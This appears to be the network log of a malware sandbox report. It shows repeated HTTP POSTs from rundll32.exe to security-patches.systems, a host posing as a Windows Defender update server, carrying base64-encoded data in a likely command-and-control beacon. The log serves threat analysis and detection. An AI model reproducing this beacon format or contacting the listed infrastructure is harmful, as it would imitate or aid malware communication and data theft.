Dec 6, 2024 22:14:32.640867949 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:34.080501080 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50113	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:34.348958969 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:35.957807064 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50114	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:36.225322008 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:37.682198048 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50115	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:37.940674067 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:39.377999067 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50116	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:39.644148111 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:41.106627941 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50117	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:41.528264999 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:42.968615055 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50118	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:43.226475000 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:44.669877052 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50119	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:44.925796986 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:46.368662119 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50120	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:46.634361982 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:48.086716890 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:47 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50121	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:48.351504087 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:49.829993963 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50122	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:50.124015093 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:51.619035959 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50123	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:51.882236004 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
